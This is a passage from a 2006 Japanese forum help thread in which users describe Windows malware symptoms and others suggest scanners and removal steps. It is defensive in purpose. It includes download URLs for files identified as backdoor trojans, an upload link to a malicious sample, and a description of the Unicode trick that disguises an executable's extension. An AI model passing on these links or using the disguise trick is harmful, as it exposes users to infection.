>>421
それらの.exeを↓で検索してみる(pfwでそのサイト以外接続できないようにして あるいは別pcで)
http://www.trendmicro.co.jp/vinfo/virusencyclo/

ほいでバスターの体験版でもいれる

基本的にはリカバリ推奨

exe.exexっつうマルウエアもあるんだな 勉強にナタ
423名無しさん@お腹いっぱい。:2006/12/01(金) 21:27:01
【使用OS】windowsXP
【WINDOWS UPDATE】 最新
【ウィルスソフト】  avast, ノートン
【UPDATE】  してる
【スキャン】 かけてる
【症状】  再起動+fromJASRACがシステムに食い込み強制再起動
      再起動後、WindowsMediaPlayerが起動し、しばらくしたらまた強制再起動
【やったこと】 ダウンロードしたファイル内にあった、「ReadmeXE.txt」をダブクリ。
         感染したと気づいた後、プロパティを見ると、「Readmtxt.eXE」に変わっていた。
         しかしフォルダ内では「ReadmeXE.txt」と表示されていた。
【とった処置】 トレンドマイクロオンラインでスキャン
         現在はサブマシンでアクセス、復旧の目処がたたないためメインは放置
424名無しさん@お腹いっぱい。:2006/12/01(金) 21:39:18
>>423
ノートンスレに解決策あり
425名無しさん@お腹いっぱい。:2006/12/01(金) 21:41:15
>>423
ReadmeXE.txtが気になる
テキストファイルにそんなことできるのか
426 ◆N9P3SuvBPo :2006/12/01(金) 21:45:57
>421
nordsys.exe oasclnt.exe exe.exe wuauclt.exe
のうち、oasclnt.exeはマカフィーのだから
他のはどうかな…?
とりあえずnordsys.exe oasclnt.exe exe.exe wuauclt.exeのファイルを検索して
見つけて、プロパティ開いて会社名とか見てマルウェアかどうか判断してみ?
427名無しさん@お腹いっぱい。:2006/12/01(金) 22:11:11
>>424
レスありがとうございます。
おかげで解決しました。

>>425
ReadmeEX.txtに関してはよくわかりません。
一応UPしておきましたので、判る方はお願い致します。
http://n.limber.jp/n/6vofXqLFe
中身は「ReadmeEX.txt」のみです。
428名無しさん@お腹いっぱい。:2006/12/01(金) 22:21:43
>>425
Unicode制御文字の挿入
ttp://vista.jeez.jp/img/vi6497899372.png
429名無しさん@お腹いっぱい。:2006/12/01(金) 22:24:19
>>427-428
サンクス
アイコンも偽装すれば初心者がいっぱい釣られそうだなこれ
430名無しさん@お腹いっぱい。:2006/12/01(金) 22:32:16
これかなりやばいね
いわれなきゃ おいらひっかかってる
431名無しさん@お腹いっぱい。:2006/12/01(金) 23:00:10
こりゃ全種類の拡張子をチェックしないといかんかな
画像や動画でやられると踏んじゃうね
432名無しさん@お腹いっぱい。:2006/12/02(土) 00:52:16
なんかタスクバーのところに赤い○に白い×のマークで、そこにポインタを合わせると
your computer is infectedっていうのが出現して困ってます
誰か助けて〜
433名無しさん@お腹いっぱい。:2006/12/02(土) 02:38:46
>>432
なんにも怪しいソフトを入れた記憶がないのなら、まずはオンラインスキャンで探ってみてちょ
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
ttp://www.kaspersky.co.jp/scanforvirus/
434名無しさん@お腹いっぱい。:2006/12/02(土) 03:37:57
>>433
ありがとう解決したよ。ユーみたいなやさしい人がいるから2chはやめられない
435名無しさん@お腹いっぱい。:2006/12/02(土) 09:17:31
>>434
どういたしまして(^o^)
436名無しさん@お腹いっぱい。:2006/12/02(土) 14:02:39
>>282
先ほど、AntiVirがC\Program Files\Lhaplus\Lhaplus.exeを「TR/Dldr.Stration.I」
として検出したのですが、誤検出だと考えてよろしいでしょうか?

おいら、とりあえず、Lhaplus.exeの削除、Lhaplusのアンインストールをしてみた。
けど、タスクマネージャーでexplorer.exeが、何もしてしてない時もいつも動いてます。
explorer.exe-02121B1A.pf、IEXPLORE.EXE-2D97EBE6.pf、とかつくられてます。
消してもまたできるので、レジストリが書き換えられてるのではと思いますが、
元に戻せますか?
437名無しさん@お腹いっぱい。:2006/12/02(土) 14:12:08
>>436
AntiVirスレ見ろ
散々既出だ
438名無しさん@お腹いっぱい。:2006/12/02(土) 14:31:07
さっきウィルスバスターオンラインで検索してみたら
BKDR_HUPIGON.GEN
BKDR_HUPIGON.AHP
BKDR_GRAYBIRD.GR
の3つが検出されたんだけど、ヤバイのかな?
ウチなんもウィルス駆除ソフトいれてないっす。
アドバイスお願い申す
439名無しさん@お腹いっぱい。:2006/12/02(土) 14:31:37
440名無しさん@お腹いっぱい。:2006/12/02(土) 14:33:10
後、ウイルス反応のあった検出場所を
441名無しさん@お腹いっぱい。:2006/12/02(土) 14:39:23
>>439
おk
【使用OS】windowsXP
【WINDOWS UPDATE】 2ヶ月前
【ウィルスソフト】  何もナシ
【UPDATE】  していない
【スキャン】 かけていない
【症状】  特に表れていない
検出されたのが
BKDR_HUPIGON.GEN
BKDR_HUPIGON.AHP
BKDR_GRAYBIRD.GR

場所はWINDOWSフォルダですがいじるの怖いんでなんもしてません
お願いします
442名無しさん@お腹いっぱい。:2006/12/02(土) 14:55:39
443名無しさん@お腹いっぱい。:2006/12/02(土) 14:58:34
444名無しさん@お腹いっぱい。:2006/12/02(土) 15:14:41
>>442,443
レスありがとう
これってトロイだったのかorz
受験勉強するため接続今日で切るんだが、オフラインでも関係なく使われるんでしょか
445名無しさん@お腹いっぱい。:2006/12/02(土) 16:11:26
>>443
いいえ ルーターとファイアーウォールがあるから心配ないです
446名無しさん@お腹いっぱい。:2006/12/02(土) 16:12:29
ケーブル抜いてる間は外から操作されたり、新しく何か盗まれるこたないが…
オフラインにしたって飼っといて気持ちのいいもんじゃあるまいに
再インストールできない理由でもあるのか?

それからそのマシンでクレジットカードとか個人情報とか
入力した覚えがあるなら変えられるものは変更することを勧める
今時のマルウェアは金銭目的だから
447名無しさん@お腹いっぱい。:2006/12/02(土) 16:37:44
【使用OS】windowsXP
【WINDOWS UPDATE】 2ヶ月前
【ウィルスソフト】  はいってない
【UPDATE】  してる
【スキャン】 してない
【症状】   文字の入力モードが勝手に激しく変わる(ひらがな→直接入力→全角英数…)
  
【とった処置】 トレンドマイクロオンラインでスキャン、検出されず
448名無しさん@お腹いっぱい。:2006/12/02(土) 18:02:07
>>447
キーボード買い替えろ
449名無しさん@お腹いっぱい。:2006/12/02(土) 18:24:51
ワラタw
450名無しさん@お腹いっぱい。:2006/12/02(土) 18:25:52
【使用OS】Win2k sp4
【WINDOWS UPDATE】してる
【ウィルスソフト】ノートンアンチウィルス
【UPDATE】してる
【スキャン】フルスキャン済み
【症状】winnt\explorer.exeが61.152.92.99にアクセスしようとする。
【やったこと】調べてみると、imkill.98link.com|BT|Hijackers#BLMというキーワードが見つかるが、
        国内のウィルスデータベースには特に記述が見当たらない。中華系?
【とった処置】スパイウェア駆除ソフトとノートン先生にお願いしたが、特に検出されず。
        現在はファイヤーウォールでブロック中。

とりあえず、何がexplorer.exeを叩いているのかが知りたいんです。
心覚えのある人いますか?
451名無しさん@お腹いっぱい。:2006/12/02(土) 18:32:42
>>450
imkill.98link.com
これでググルと・・・・
452名無しさん@お腹いっぱい。:2006/12/02(土) 18:47:26
まったくもってウイルス初心者です。
【使用OS】WindowsXP
【WINDOWS UPDATE】してる
【ウィルスソフト】Avira AntiVir PersonalEdition Classic
【UPDATE】ついさっき
【スキャン】UPDATE後Cドライブ全スキャン
【症状】不明
【やったこと】Winnyなどやってましたが、その頃はウイルスバスター2006で反応なしでした。
【とった処置】隔離

C:\System Volume Information\_retore{051B990F-C89C-4A21-9197-F1FC8B708C1F}\RP345\A0051354.exe
検出したウイルス名:BDS/Delf.BF

C:\System Volume Information\_retore{051B990F-C89C-4A21-9197-F1FC8B708C1F}\RP344\A0051329.exe
検出したウイルス名:Contains signature of the worm WORM/Antinny

C:\Program Files\Ulead Systems\Ulead DVD MovieWriter 4\Instsys3ff3.exe
検出したウイルス名:Contains signature of the worm WORM/Antinny


削除でいいのでしょうか?AntiVirは誤検出も多いと聞いたもんで・・。
453名無しさん@お腹いっぱい。:2006/12/02(土) 19:06:28
>>452
こっちで聞いて
Avira AntiVir PersonalEdition Classic Part19
http://pc8.2ch.net/test/read.cgi/sec/1164979595/
454450:2006/12/02(土) 19:41:01
>>451
「ランダムな文字列」にてこずりましたが、
該当ファイルとレジストリキーの削除に成功しました。
どもです。
455名無しさん@お腹いっぱい。:2006/12/03(日) 17:12:20
ISOにもウィルス憑くらしいけど
どうやって駆除するの? 不安でたまらない
456名無しさん@お腹いっぱい。:2006/12/03(日) 17:33:16
不安を取り除くにはP2Pをやめるこったな
457名無しさん@お腹いっぱい。:2006/12/03(日) 17:38:01
>>455
オートランを切ってウイルスチェックするだけだ
458名無しさん@お腹いっぱい。:2006/12/03(日) 21:37:29
【使用OS】WindowsXP
【WINDOWS UPDATE】してる
【ウィルスソフト】Avira AntiVir PersonalEdition Classic
【UPDATE】してる
【スキャン】Cドライブ全スキャン
【症状】IEXPLORE.EXE-2D97EBE6.pfが、C:\WINDOWS\Prefetch に作成される。
    タクスマネージャー上に、IEXPLORE.EXEが4つ存在し、うち2つがメモリー30,880Kと28,432K。
【やったこと】
【とった処置】まだなにも。

IEXPLORE.EXE-2D97EBE6.pfをネットで調べて見たが、日本語のページが無く、?でした。
どうしたらいいでしょうか?
459名無しさん@お腹いっぱい。:2006/12/03(日) 22:06:33
>>458
>IEXPLORE.EXE-2D97EBE6.pf
WinXPでアプリの起動を高速化するための機能。正常。

>IEXPLORE.EXEが4つ存在
たまに、IEのウィンドウを閉じても、終了できずにゾンビ化してる事がある。その都度、強制終了させてるが……。
たぶん、正常。
460名無しさん@お腹いっぱい。:2006/12/04(月) 00:20:11
フルスクリーンのゲームをしてるとなぜか頻繁に落ちます。
その後、下のタスクが固まってしまい、強制終了しかなくなりってしまいます。
セキュリティソフトのせいっぽいと思うのですが。

【使用OS】WindowsXP
【WINDOWS UPDATE】してる
【ウィルスソフト】avast、sunbelt Kerio
【UPDATE】してる

原因分かる方、よろしくです。
461名無しさん@お腹いっぱい。:2006/12/04(月) 00:28:31
>>460
相性の問題が絶対にない。
とは言い切れないが、「フルスクリーン」でのゲームはハードにかなりの負担をかけるから、
まずはそっちの検証の方が先決。
462名無しさん@お腹いっぱい。:2006/12/04(月) 00:31:40
>>461
その辺は多分問題ないはずです。
CPU Athlon64 3700+(soket939)
メモリ 2G
グラボ GeForce7900GS
です。

ただ、電源が450Wなのでそれが少しあるかもですが・・・。
463名無しさん@お腹いっぱい。:2006/12/04(月) 01:00:05
>>462
それならば、疑いが持てる要因、
・アンチウイルス
・プログラムのバグ
・メモリの不具合
・エアフロー
・使用頻度によるWindowsの劣化
・プログラム、ドライバー、デバイスなどのタイミングずれによるフリーズ
464名無しさん@お腹いっぱい。:2006/12/04(月) 01:28:18

  ∩,,∩
 (`・ω・)
.c(,_uuノ
465名無しさん@お腹いっぱい。:2006/12/04(月) 02:18:22
>>460
sunbelt Kerioを使っていて、いきなり落ちる事象を何度か食らったので使用をやめてみたら
ピタリと収まった経験があるけどな
466名無しさん@お腹いっぱい。:2006/12/04(月) 07:20:06
返信遅れました。
とりあえずKerioから他のに変えてみるのからはじめてみます。
色々ありがとうございました。
467名無しさん@お腹いっぱい。:2006/12/04(月) 21:53:07
さらに報告です。

思い切ってKerioアンインストールしてみました。
とあるところで必ず落ちていた現象がウソのようになくなりました。
やはりこれが原因だった様子。

代わりにX-GUARD入れてみました。
FWとしては正直心もとないですが、ルーターもつけてるし、落ちまくるよりはいいなかと思ってます。
468465:2006/12/04(月) 22:37:45
>>467
やっぱりKerioだったかぁ。良かったじゃない原因がわかってさ。

ちなみにおれもX-GUARD入れてる。
その理由は現在KIS6.0を使っているのだが以前うpデートでいきなり落ちてしまい
短時間とはいえFWがなくなってしまうのは怖いので最終防衛ラインの維持の為にいれた。
ルータなしなのでFWがなくなるのは危うすぎる(藁)
469名無しさん@お腹いっぱい。:2006/12/05(火) 20:00:28
195 名前:名無しさん?[sage] 投稿日:2006/12/05(火) 19:52:18 ID:???
クラッキング(ハッキング)されました。。。

どうやら
7walker.com
7walker.net
どちらのサイト共にやられたようです。

階層内もずたずたにされており、
危険なファイルがまぎれている場合があるので、
サイト内にアクセスする場合は気をつけてください。

あとソースチェッカーオンラインですが、
誠に勝手ながら休憩させていただきます。
なお復帰時期は未定です。

\(^o^)/

【依頼は】鑑定人と雑談 Part81【だめぽ】
http://etc3.2ch.net/test/read.cgi/entrance/1163393226/l50
470名無しさん@お腹いっぱい。:2006/12/06(水) 01:56:30
【使用OS】windowsXP
【WINDOWS UPDATE】 してる
【ウィルスソフト】  ウィルスバスター2006
【UPDATE】  してる
【スキャン】 してる
【症状】  再起動+再起動realplayer強制起動
【やったこと】 ダウンロードしたファイル内にあったReadmeXE.txtを実行
【とった処置】 トレンドマイクロオンラインでスキャンしても検出反応なし
 
最初に再起動された後は>423のように強制再起動はされません。
これは感染してるんですか?  
471名無しさん@お腹いっぱい。:2006/12/06(水) 02:56:41
>>470
偽装ファイルだよね?
たぶん感染してると思うから>>28のカスペでスキャン
472名無しさん@お腹いっぱい。:2006/12/06(水) 03:21:23
>>470
WINDOWSフォルダ内に「fromJASRAC.midi」が作成されていれば感染している
(「感染」という表現が正しいのか微妙だが)
とりあえず該当ファイルの削除、それと
レジストリエディタの
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
以下に該当のファイル名のエントリがあったらそれも削除

「fromJASRAC.midi」の再生で青画面再起動がかかるかどうかは環境依存なので
(midに関連付けられた再生アプリ、別途サウンドカード追加しているか等)
「感染」しても再起動ループにならない場合もある

後もしWinnyあたりに手を出しているのならさっさとやめれ

>>471
カスペはおろか現存するセキュリティソフトで対応しているものは無い
スキャンはするだけ無駄
「ReadmeXE.txt」はセキュリティベンダーの定義しているマルウェアの範疇から
微妙にずれているから、これからも対応するか微妙
473名無しさん@お腹いっぱい。:2006/12/06(水) 03:23:49
と思ったらAntiVir対応してるのか
474名無しさん@お腹いっぱい。:2006/12/06(水) 03:37:39
砂箱入れてりゃ無問題
475名無しさん@お腹いっぱい。:2006/12/06(水) 03:44:35
感染元ファイルの実行前に入れていればそりゃそうだろうが…
476名無しさん@お腹いっぱい。:2006/12/06(水) 03:49:57
>>473
対応したのか。
チェックした時、カスペすら検出できなかったんで、一応、トレンドには送っておいたけどね。
477名無しさん@お腹いっぱい。:2006/12/06(水) 03:55:55
ReadmeXE.txt誰かうpして
478名無しさん@お腹いっぱい。:2006/12/06(水) 03:59:00
>>470
検証するから、うPうP
479名無しさん@お腹いっぱい。:2006/12/06(水) 04:07:33
>>476
対応していたのは
ファイルサイズ 83,456
MD5 745328f81fa7c8c4635df20bcff719e0
拡張子exe及びscrのやつ

ただ「fromJASRAC.midi」自体に対応しているのは、まだDrWebしか無い
青画面midは54〜55バイトくらいで手持ちで数種類あるが
いずれも対応してる模様

まあ本来はMSが対応すべき問題だし
480名無しさん@お腹いっぱい。:2006/12/06(水) 04:43:00
>>479
俺が持ってるのと同じだな。(ReadmeXE.txt)
今チェックしてみたら、

AntiVirFound Trojan/Drop.MID.83456.A
Dr.WebFound Trojan.Crash

だった。
まぁ、俺の場合、登録されてる拡張子は表示しないになってるので、
Readmtxt アプリケーション
になるけどね。
481名無しさん@お腹いっぱい。:2006/12/06(水) 05:33:06
482名無しさん@お腹いっぱい。:2006/12/06(水) 05:43:16
そもそも二人ともどこからそんなもん手に入れたんだ・・・
483名無しさん@お腹いっぱい。:2006/12/06(水) 06:06:00
初心者で申し訳ありません。
WINXP+SP2 フレッツのセキュリティ対策ツール=VB2006を使用してます。
先輩方のお知恵をお借りしたいのですが・・・
フリーソフトをDLし解凍→フォルダーアイコンがEXEになってたらしく、それをクリックで
「外部に接続しようとしてるプログラムがあります」の様な文言が出てきて慌ててしまい許可をクリックしてしまいました。
その時取ったログが下記です。

種類   時刻 プロトコル 送信元IPアドレス 送信元ポート 送信先IPアドレス 送信先ポート アプリケーションパス アプリケーション   名説明
例外設定0:51:04  TCP   YOUR-**********  2787   222.146.51.139      25     C:\マイ ダウ       .EXE    ---マスメール送信 (SMTP)

上記な感じでマスメールを送信してしまったっぽいのですが・・・
マスメールとは何なのか・・・送信してしまったメールの内容がなんだったのか・・・
気になってしまい眠れません。
どなたか御教授お願いします。
484名無しさん@お腹いっぱい。:2006/12/06(水) 06:14:15
だからなんでそのフリーソフトの名前を書かないんだよ
書けない理由でもあんのかよ
485名無しさん@お腹いっぱい。:2006/12/06(水) 07:10:19
>>483
せっかく書いたのにマルチかよっ…………。
http://pc8.2ch.net/test/read.cgi/sec/1163437035/557
486名無しさん@お腹いっぱい。:2006/12/06(水) 08:16:40
【使用OS】 WINXP Home SP2
【WINDOWS UPDATE】 自動更新。現在最新
【ウィルスソフト】 Norton Internet Security2006
【UPDATE】 自動更新。現在最新
【スキャン】 Nortonでスキャン→ウイルスなし
カスペのオンラインスキャン→rundll.exeがTrojan-Spy.Win32.Delf.tt

【症状】 システムの復元が不可
シマンテックの検体提出ページにアクセス不可(俺だけ?)
バスターのオンラインスキャンアクセス不可

【やったこと】 【とった処置】
scrファイルふむ→ケーブル引っこ抜き
scrファイルを別PCのバスターでスキャンするとTSPY_DELF.DNOと表示されました。
487名無しさん@お腹いっぱい。:2006/12/06(水) 09:03:37
>>486
ああ そうですか
488名無しさん@お腹いっぱい。:2006/12/06(水) 09:11:01
>>486
感染オメ
489486:2006/12/06(水) 13:17:17
助けてください。
490名無しさん@お腹いっぱい。:2006/12/06(水) 13:23:26
>>489
ノートン投げ捨てて各社体験版で駆除
491名無しさん@お腹いっぱい。:2006/12/06(水) 13:35:28
>>489
大至急KISを買ってきて駆除すればいい
492名無しさん@お腹いっぱい。:2006/12/06(水) 13:49:46
>>486
とりあえず Bit Defender いれてスキャンやってみ、
非常駐型だからノートン入っていても競合起こさないから。
それで駆除できなければ、一度ノートン削除して、
>>490が言うように他社のやつ入れればいい。
493名無しさん@お腹いっぱい。:2006/12/06(水) 14:23:01
>>490
>>491
>>492
ありがとうございます。
試してみます。
494名無しさん@お腹いっぱい。:2006/12/06(水) 14:24:44
test
495名無しさん@お腹いっぱい。:2006/12/06(水) 16:01:31
zipファイルにantinyが検出されたんですが
解凍してファイルが例えば6個出てきたとして
感染ファイルを実行しなければ
他のファイルは普通に使用してOKなんでしょうか?
496名無しさん@お腹いっぱい。:2006/12/06(水) 16:25:57
>>495
開いた途端に感染だよ
巣に帰れ、ダウソ厨
497名無しさん@お腹いっぱい。:2006/12/06(水) 17:12:47
>>495
ウィルスが検出されてもなお解凍して見たいものってのは一体何なんだ?
498名無しさん@お腹いっぱい。:2006/12/06(水) 17:19:46
駆除できたと思っても、再復活するウイルスもあるので、
誰も絶対安全かどうかの保証はしてくれない。

どのようなルートで所有したのかは別に興味はないが、
すべて「自己責任」でどうぞ
499名無しさん@お腹いっぱい。:2006/12/06(水) 17:27:23
アルバムのmp3でした
解答thx
500名無しさん@お腹いっぱい。:2006/12/06(水) 17:48:17
【使用OS】 WIN 2000 SP4
【WINDOWS UPDATE】 してます
【ウィルスソフト】 Error Doctor 2007
【UPDATE】 してます
【スキャン】 27個のリスクが見つかり、「Remove」というボタンを押すと製品の購入ページに接続する。
【症状】 海外のエロサイト見ていて、バナーをクリックしたら出てきた。
【やったこと】 騙されてインストール
【とった処置】 今はへこんでいます。
501470:2006/12/06(水) 17:48:19
>>471>>472>>481
レスありがとうございます。
Dr.Web CureIt!でスキャンしたらfromJASRAC.midiが検出されました。
↑のファイル削除したんですが、これで正常(?)になったことになるんですか?
>>478
うp仕方わからないので…
502名無しさん@お腹いっぱい。:2006/12/06(水) 18:01:19
>>500
>【ウィルスソフト】 Error Doctor 2007
>【やったこと】 騙されてインストール
お茶ふいたw
503名無しさん@お腹いっぱい。:2006/12/06(水) 18:02:17
>>500
http://cowscorpion.com/Software/secu02s2.html
とりあえず、上記のURLから「spybot」と「ad-aware」を最低限ダウンロードして、
インスト、実行。

あとは、ウイルスのオンラインスキャンもしてみてチェック。

上のサイトには、無料のウイルス対策ソフトや ファイアーウォールもあるので、好みに応じどうぞ。
エロサイトからダウンロードできるものよりは、はるかに信頼できますから
504名無しさん@お腹いっぱい。:2006/12/06(水) 18:04:35
>>501
ttp://viploader.net/

うPろだを使うといいよ
505503:2006/12/06(水) 18:08:31
>>500

肝心な事を忘れていたわ。
その誘致ウイルスソフト「Error Doctor 2007」も削除しておいた方がいいね。
506名無しさん@お腹いっぱい。:2006/12/06(水) 18:10:00
うpらなくていいです。
507名無しさん@お腹いっぱい。:2006/12/06(水) 18:35:31
【やったこと】
【とった処置】

たいていどこのトラブルスレにもある項目。
で、大方の人の行動は  「状況をさらに悪化させた」 の一言に尽きる。
508名無しさん@お腹いっぱい。:2006/12/06(水) 18:48:55
【やったこと】オナニー
【とった処置】ティッシュで処理
509名無しさん@お腹いっぱい。:2006/12/07(木) 00:35:46
TROJ_DYFICA.AW
このウイルスに感染してしまったのですがどうしたらよいでしょうか?
セキュリティソフトは入れてません。
今panda active scanの無料スキャン&駆除でスキャン中です。
どなたかマジレスお願いします(泣)
510名無しさん@お腹いっぱい。:2006/12/07(木) 00:43:27
511名無しさん@お腹いっぱい。:2006/12/07(木) 00:52:49
942 名前:名無しさん@お腹いっぱい。 [] 投稿日:2006/12/07(木) 00:37:48    New!!
TROJ_DYFICA.AW
このウイルスに感染してしまったのですがどうしたらよいでしょうか?
セキュリティソフトは入れてません。
今panda active scanの無料スキャン&駆除でスキャン中です。
どなたかマジレスお願いします(泣)


マルチ乙!!
512486:2006/12/07(木) 01:14:32
>>490
>>491
>>492
ありがとうございました。

まずbitdefenderインスコ→検知しない。
ノートン、bitdefenderをアンインスコしてKISお試し版で削除できました。




513名無しさん@お腹いっぱい。:2006/12/07(木) 01:38:06
>>512
ノートンで反応無しでKISお試し版で駆除か
なんだかなぁw
514名無しさん@お腹いっぱい。:2006/12/07(木) 01:49:54
普通だろ
ノートンの糞検出率はテストで立証済み
515名無しさん@お腹いっぱい。:2006/12/07(木) 02:14:17
516名無しさん@お腹いっぱい。:2006/12/07(木) 02:49:31
これいかにも怪しいんだけど、どんな動きするの?
Upack ttp://baidu.chinacainiao.org/ddos.exe
UPX ttp://baidu.chinacainiao.org/setup.exe
517名無しさん@お腹いっぱい。:2006/12/07(木) 03:00:43
二つ目は知らんけど、一つ目はDDoSってなってんじゃん
518名無しさん@お腹いっぱい。:2006/12/07(木) 03:06:49
ファイル名で判断しない人希望
519名無しさん@お腹いっぱい。:2006/12/07(木) 03:14:03
>>516
上 Win32:Hupigon-FB [Trj]
下 Win32:Hupigon-XI [Trj]

それでも実行してほしければここにでも持ってけ
ttp://pc8.2ch.net/test/read.cgi/sec/1140517079/
520名無しさん@お腹いっぱい。:2006/12/07(木) 03:43:55
NODさんが上に反応してくれない
521名無しさん@お腹いっぱい。:2006/12/07(木) 04:17:06
522名無しさん@お腹いっぱい。:2006/12/07(木) 04:19:12
実行すれば反応するかもしれないけど実行する勇気はない
523名無しさん@お腹いっぱい。:2006/12/07(木) 04:42:49
【使用OS】 WIN xpSP2
     ブラウザ:IE
【WINDOWS UPDATE】 してます
【ウィルスソフト】 NIS・Ad-aware
【UPDATE】 してます
【スキャン】 keyなんたらハイジャッカー?を2個発見。
【症状】 googleキャッシュで円光サイト見たせい?
以前もそこを見たときは無反応だったんだが。
【やったこと】Ad-awareで削除。
【とった処置】Ad-awareで削除。
セキュリティ高・クッキーオフでも、スパイウェアってかかるんですか?
おんなのはじめてです。
524名無しさん@お腹いっぱい。:2006/12/07(木) 05:12:17
>>519
Kasperskyから返事あり。バックドアでした。
525名無しさん@お腹いっぱい。:2006/12/07(木) 05:49:18
>おんなのはじめてです。
(*゜ー゜)
526名無しさん@お腹いっぱい。:2006/12/07(木) 10:49:31
>>523
セキュリティインスペクタ機能で
ブラウザ設定のセキュリティホールを確認。
もっと勉強しろ。
527523:2006/12/07(木) 17:42:33
>>526
d。
問題点は、ユーザーパスワードが脆弱のみ。

しかし、本当にスパイウェアなら、NIS(常駐)が無反応ってなんなのさ。
ノートントラップにはひっかかるわ、安全なメールをスパム扱いするくせに、
ヘンな添付メールは直通だし、役立たず。
528526:2006/12/07(木) 19:00:27
>>523
Nortonがスパイウェアに対応したのは2006から
とくに海外フリーソフトのダウンロード時なんかいつもより気をつけるべし。
ブツが特定できたらシマンテックに送りつけといてやれ。

■ウイルス感染の疑いがあるファイルをSymantec Security Responseに提出する方法
http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
529名無しさん@お腹いっぱい。:2006/12/07(木) 19:07:57
>>528
見れないんですが・・
530名無しさん@お腹いっぱい。:2006/12/07(木) 19:21:28
>>525
        -――‐- 、
        /        ヽ   ♪ じゃあ、
      / ヽ_乂_乂_乂丿 l      今夜は
      |   ∩    ∩   |    お赤飯だね ♪
     |    ∪    ∪  |
    /           `ヽ
   /  r―0――――――┐丶
    |   |___0__o__,!  l
   ゙、  l           / ノ
    ヽ、ヽ、――0-⊂二二ニ⊃
     >-‐(⌒)== |       |
     (_ノ ̄  ̄  \__ (⌒)
      /        └┬' ̄
      / _____  ⊥-‐(∬∫) 、
 ,,,-―''^ ̄        (  (∫∬∬) ) ̄`ー-、
                  `ー-ニ二ニ-‐'
531526:2006/12/07(木) 19:39:34
>>523 >>529
検体提出ページ工事中なんだってさ・・・
スマンテック○| ̄|_
532名無しさん@お腹いっぱい。:2006/12/07(木) 20:10:48
>>531
> 検体提出ページ
この URI じゃダメかな('A`)
多分英語じゃないと受け付けてくれないけど……
ttps://submit.symantec.com/websubmit/retail.cgi
533名無しさん@お腹いっぱい。:2006/12/07(木) 21:01:50
>>528
NIS2006なんですが・・・。
534名無しさん@お腹いっぱい。:2006/12/07(木) 21:06:27
>>533
これ以上526を虐めるんじゃない
535526:2006/12/07(木) 21:38:27
>>532
遠距離なんで、TTL値を目一杯上げて(265)Zipの状態でPass記入して送信してみたけど
成功しなかった。。。
536名無しさん@お腹いっぱい。:2006/12/07(木) 22:13:02
>>535
>>532っす。こっちの環境では送信は可能だった(受信通知もきた)から機能的には問題ないっぽい
しかし結構重かった('A`)あと、

> Zipの状態でPass記入して

とあるので、もしかして zip にパスワードかけたのかな
「should not be password-protected」らしいのでパス無しで平気だよ 勘違いだたらスマソ
537526:2006/12/07(木) 22:56:54
>>536
「should not be password-protected」見逃してたよ。
感染してないんで、とくに送るものが手元に無かったんだ。
みんなもっとスマンテックにクレーム出した方がいいよ。オンラインサポートフォームに箇条書きででもいいし。
続きは本スレで。。。
538名無しさん@お腹いっぱい。:2006/12/07(木) 23:36:42
win2000でお勧めのセキュリティソフトは何でしょう?
ノートンの新しいやつはXPでないと無理だし…
539名無しさん@お腹いっぱい。:2006/12/07(木) 23:41:46
>>538
KasperskyかNOD32。
両方とも試用版があるんで使ってみるといいよ。
540名無しさん@お腹いっぱい。:2006/12/08(金) 00:14:10
【使用OS】 windowsXP home edition sp1
【WINDOWS UPDATE】してない
【ウィルスソフト】 ウィルスバスター2007
【UPDATE】 してる
【スキャン】 した
【症状】 ローカルエリア内のhtmlファイル全てに
     <iframe src=どっかのURL></iframe>
     っていうインラインフレームのタグが追加されて書き換えられてた
【やったこと】ネットサーフィン
【とった処置】 ウィルスファイルの削除とインラインフレームの記述を削除

最初、インラインフレームに気付かなくて、ウィルスファイルを削除した後
ローカルにあったhtmlファイルを開いたら、またウィルスを読み込んだ。
ファイル置換ソフトを使ったんで、htmlファイルを修正するのは
楽だったけど、手間には変わりないんで、今ネット巡るのがちょっと怖い。
541名無しさん@お腹いっぱい。:2006/12/08(金) 00:38:59
>>540
>【使用OS】 windowsXP home edition sp1

どうせなら無印XP使え
542名無しさん@お腹いっぱい。:2006/12/08(金) 07:57:13
【使用OS】 Windows2000
【WINDOWS UPDATE】 全て済み
【ウィルスソフト】 AVG Free
【UPDATE】 頻繁にしてる
【スキャン】 「AVG」 「Ad-Aware SE Personal」 「Spy-Bot」 「Windows Live Safety Center Beta」の4つをして、発見されたのは全て消した。
【症状】 勝手にIEが立ち上がり、「http://pop.9v.cn/code/showpop.asp」が開く。
http://bst96.com/」の時もマレにあり。
勝手にアクティブなウィンドウが変わる。(裏にあった窓やアプリにアクティブが行く)
【やったこと】 PCゲーム「Ultima」の攻略記事を探し、海外サイトをあちこち見たので、その時かと・・・。
【とった処置】 「AVG」 「Ad-Aware SE Personal」 「Spy-Bot」 「Windows Live Safety Center Beta」でスキャンし、発見されたものは全て消しました。
Ad-Awareで2つ発見、その後同じくAd-Awareをセーフモードでかけて6つ発見。
Windows Live Safety Center Betaでは16箇所の問題が出たけど、重要な修正が必要なのは1つと出て、その1つは削除された模様。

それでも相変わらず2種類のURLのIEが勝手に開きます・・・。
ウィンドウのアクティブもちょこちょこと変わる・・・。
スパイウェアなのかウィルスなのか、なんなんでしょう?
543名無しさん@お腹いっぱい。:2006/12/08(金) 11:19:40
テンプレ
【使用OS】XP
【WINDOWS UPDATE】済み。
【ウィルスソフト】norton AntiVirus
【UPDATE】してあった。12/5>12/7に手動でupdate
【スキャン】Nrton AntiVirusで完全スキャン
【症状】多分なし(分かりません)

今日、Norton AntiVirusで完全スキャンをしたらwrar330ja.exeがW32.fujack.Aに
感染していると出ました。
で、wrar330ja.exeだけをスキャンしたらやはり感染してるとなりました。

一応、定義ファイルの最新版を入れてもう一回スキャンしようと思って手動で定義ファイル
をダウンロード、インストールしました。
で、もう一度スキャンしたら感染してるというのが出なくなりました・・・。

これは・・・Norton AntiVirus誤作動と考えてよいのでしょうか。
544名無しさん@お腹いっぱい。:2006/12/08(金) 16:04:24
1000BASEのLANを組んでセキュリティソフトを動かしてるときと動かしてないとき
のLAN内の速度差があんまり激しくないソフトはありますか?
545名無しさん@お腹いっぱい。:2006/12/08(金) 16:22:09
Windows XP起動直後、スタートアップから
mod_v15mウィルス感染警告二時間感染防止のため30分後シャットダウンします
とshutdown.exeが実行され、IEで悪名名高いウィルスソフト
